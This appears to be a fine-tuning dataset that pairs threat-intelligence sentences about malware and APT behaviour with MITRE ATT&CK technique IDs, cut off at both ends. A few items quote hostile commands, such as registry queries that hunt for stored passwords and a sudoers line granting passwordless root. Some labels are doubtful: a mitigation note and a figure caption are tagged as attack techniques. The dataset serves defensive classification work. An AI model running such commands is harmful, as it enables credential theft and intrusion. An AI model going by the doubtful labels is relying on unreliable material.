password hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In 2016, APT28 conducted a distributed denial of service attack against the World Anti-Doping Agency.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has used blogs and WordPress for C2 infrastructure.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer .### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has obfuscated code using RC4, XOR, and RSA.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used VBS scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mofang delivered spearphishing emails with malicious links included.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These personas may be fictitious or impersonate real people.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to hide and unhide files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can collect the username on the victim machine to send to C2.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has added RSA keys in authorized_keys.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot creates processes using the Windows API calls: CreateProcessA and CreateProcessAsUserA.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie uses the tasklist to view running processes on the victim’s machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For early Gazer versions, the compilation timestamp was faked.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has been delivered as an unsigned MSI package that was executed with msiexec.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CTU researchers identified BRONZE UNION actors using a file named ms.exe that was likely a credential-abuse tool from the Kekeo toolset### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary shellcode### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Winnti for Windows installer loads a DLL using rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Victim Registration SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOWDRIFT collects and sends system information to its C2.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT sends collected files back over same C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis used GetProcAddress and LoadLibrary to dynamically resolve APIs.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses a shell script to execute Mach-o files and osacompile commands such as, osacompile -x -o xcode.app main.applescript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON can capture screenshots and store them locally.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has been delivered with encrypted resources and must be unpacked for execution.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can collect network and active connection information.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has changed user account passwords and logged users off the system.### Assistant: T1531: Account Access Removal" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows system WMI data is stored in the WMI common information model (CIM) repository, which consists of several files in the System32\wbem\Repository directory### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can maintain persistence by creating an auto-run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec is capable of using DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton uses macOS' .command file type to script actions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can obtain digital certificates or create self-signed certificates .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,119 readFiles Obtains file information on a file or a folder, and supports a “*” wildcard and recursive file list### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used BITSAdmin to download and install payloads.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor has the ability to upload and download files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PHOREAL is capable of creating reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Timezone Check The Trojan check to see if the system is configured (“DaylightName”) with one of the following time zones:   Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) Human Interaction Check Before executing its functional code, the Trojan presents a dialog box with the following line of code:   Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3), MsgBoxStyle.Critical, null);   This dialog box displays  An error occurred while processing user32.dll!, which the user must click the ok button for the Trojan to run its functional code### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can execute a WMI query to gather information about the installed antivirus engine.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN decrypts code, strings, and commands to use once it's on the victim's machine.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor uses cmd.exe to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search compromised systems to find and obtain insecurely stored credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor has downloaded additional malware, including by using certutil.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can collect host IP information from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA can enumerate files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon uses commands such as netsh interface show to discover network interface settings.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy can execute remote commands in the Windows command shell using the WinExec API.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm .### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok adds admin ALL= NOPASSWD: ALL to the /etc/sudoers file.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can store collected data locally in a created .nfo file.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can enumerate the current process on a compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum was seen using MimikatzLite to perform credential dumping.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Those infected systems can then send the output from those commands back over that Web service channel.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the application shimming feature allows developers to apply fixes to applications that were created for Windows XP so that it will work with Windows 10.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can download and execute additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used mshta.exe to run malicious scripts and download programs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used links in e-mail to steal account information.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a module to collect data from removable drives.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can collect the timestamp from the victim’s machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used WMI event subscriptions for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To run persistently on the system, the Trojan will first create a VBScript file:SpecialFolder.CommonApplicationData\srvResesponded.vbs that contains:CreateObject(“WScript.Shell”).Run(“%app%”) The Trojan replaces the %app% string in the above VBScript with the path to its executable### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has used PowerShell to download additional modules.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS establishes a backdoor over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage code repositories to collect valuable information.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used WMI queries to detect if virtualization environments or analysis tools were running on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File sharing over a Windows network occurs over the SMB protocol.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon renamed a malicious service taskmgr to appear to be a legitimate version of Task Manager.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon executes functions using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dipsind can download remote files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used .MSI files as an initial way to start the infection chain.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can collect account information from the victim’s machine.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another variant decodes the embedded file by XORing it with the value ""0x35"".### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has several VBS scripts used throughout the malware's lifecycle.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used the Steam community page as a fallback mechanism for C2.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec has a plugin to drop and execute vulnerable Outpost Sandbox or avast!### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 has sent emails with malicious Microsoft Office documents attached.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to decrypt, load, and execute a DLL and its resources.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe has a command to delete a file from the machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has relied on users opening malicious attachments delivered through spearphishing to execute malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 used RDP to move laterally in victim networks.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example commands to find Registry keys related to password information: * Local Machine Hive: reg query HKLM /f password /t REG_SZ /s * Current User Hive: reg query HKCU /f password /t REG_SZ /s TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key Valak can use the clientgrabber module to steal e-mail credentials from the Registry.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SSH config file is usually located under /etc/ssh/sshd_config.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has deployed a utility script named kill.bat to disable anti-virus.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX allows actors to spawn a reverse shell on a victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information or Compromise Accounts and/or sending multiple, seemingly urgent messages.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has configured tools to automatically send collected files to attacker controlled servers.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process hollowing is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can send data to C2 with HTTP POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used net.exe user and net.exe users to enumerate local accounts on a compromised host.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The QakBot web inject module can inject Java Script into web banking pages visited by the victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A startup item is a directory whose executable and configuration property list , StartupParameters.plist, reside in the top-level directory.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also obtain browsing history, cookies, and plug-in information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's hosts that can be used during targeting.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus has used -WindowStyle Hidden to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use domain generation algorithms in C2 communication.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has harvested credentials from the victim's machine using Empire.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has been bundled with legitimate software installation files for disguise.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to list running processes on a compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has downloaded additional scripts and files from adversary-controlled servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NativeZone can decrypt and decode embedded Cobalt Strike beacon stage shellcode.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data could also be concealed within the email messages themselves.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has installed web shells on compromised hosts to maintain access.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The KilaAlfa keylogger also reports the title of the window in the foreground.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used tasklist to enumerate processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can mimic the names of known executables.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-1314 actors mapped network drives using net use.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to launch files using ShellExecute.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used Mimikatz's DCSync to dump credentials from the memory of the targeted system.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT modified its security token to grants itself debugging privileges by adding SeDebugPrivilege.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While it includes multiple ways to find Explorer, the preferred method is to get the process id from the current desktop window.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,looks for net and account or domain in close proximity ### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files may be copied from one system to another to stage adversary tools or other files over the course of an operation.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Only files with sizes less than 500MB are encrypted.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MBR passes control of the boot process to the VBR.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,17 Complete List of Malware Files Fig### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Botnets are commonly used to conduct network flooding attacks against networks and services.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Persistence Once started, the Keydnap backdoor installs a plist file in /Library/LaunchAgents/ if it has root privileges or $USER/Library/LaunchAgents/ otherwise to achieve persistence across reboots### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has obfuscated scripts used in execution.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-8174, CVE-2018-0802, and CVE-2017-11882, as well as other vulnerabilities such as CVE-2019-9489 and CVE-2020-8468, to enable execution of their delivered malicious payloads.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used tools that communicate with C2 over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The DLL is also digitally signed by a certificate from “AirVPN”### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has sent data to its C2 server via POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Accounts, and/or initial access or Trusted Relationship### Assistant: T1591: Gather Victim Org Information" "### 